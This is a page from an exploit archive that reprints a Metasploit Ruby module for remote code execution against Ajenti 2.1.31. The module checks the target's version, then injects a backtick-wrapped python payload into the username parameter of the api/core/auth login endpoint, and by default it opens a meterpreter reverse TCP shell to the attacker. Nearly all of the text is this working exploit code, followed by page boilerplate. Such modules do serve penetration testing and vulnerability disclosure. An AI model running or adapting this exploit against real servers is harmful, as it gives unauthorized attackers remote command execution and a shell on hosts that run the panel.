Ajenti 2.1.31 Remote Code Execution

2019.10.30

Credit: Jeremy Brown

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

# Exploit Title: Ajenti 2.1.31 - Remote Code Exection (Metasploit)
# Date: 2019-10-29
# Exploit Author: Onur ER
# Vendor Homepage: http://ajenti.org/
# Software Link: https://github.com/ajenti/ajenti
# Version: 2.1.31
# Tested on: Ubuntu 19.10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => "Ajenti 2.1.31 Remote Code Execution",
'Description' => %q{
This module exploits a command injection in Ajenti <= 2.1.31.
By injecting a command into the username POST parameter to api/core/auth, a shell can be spawned.
},
'Author' => [
'Jeremy Brown', # Vulnerability discovery
'Onur ER <onur@onurer.net>' # Metasploit module
],
'References' => [
['EDB', '47497']
],
'DisclosureDate' => '2019-10-14',
'License' => MSF_LICENSE,
'Platform' => 'python',
'Arch' => ARCH_PYTHON,
'Privileged' => false,
'Targets' => [
[ 'Ajenti <= 2.1.31', {} ]
],
'DefaultOptions' =>
{
'RPORT' => 8000,
'SSL' => 'True',
'payload' => 'python/meterpreter/reverse_tcp'
},
'DefaultTarget' => 0
))
register_options([
OptString.new('TARGETURI', [true, 'Base path', '/'])
])
end
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => "/view/login/normal"
})
if res and res.code == 200
if res.body =~ /'ajentiVersion', '2.1.31'/
return Exploit::CheckCode::Vulnerable
elsif res.body =~ /Ajenti/
return Exploit::CheckCode::Detected
end
end
vprint_error("Unable to determine due to a HTTP connection timeout")
return Exploit::CheckCode::Unknown
end
def exploit
print_status("Exploiting...")
random_password = rand_text_alpha_lower(7)
json_body = { 'username' => "`python -c \"#{payload.encoded}\"`",
'password' => random_password,
'mode' => 'normal'
}
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri, 'api', 'core', 'auth'),
'ctype' => 'application/json',
'data' => JSON.generate(json_body)
})
end
end

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Ajenti 2.1.31 Remote Code Execution

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.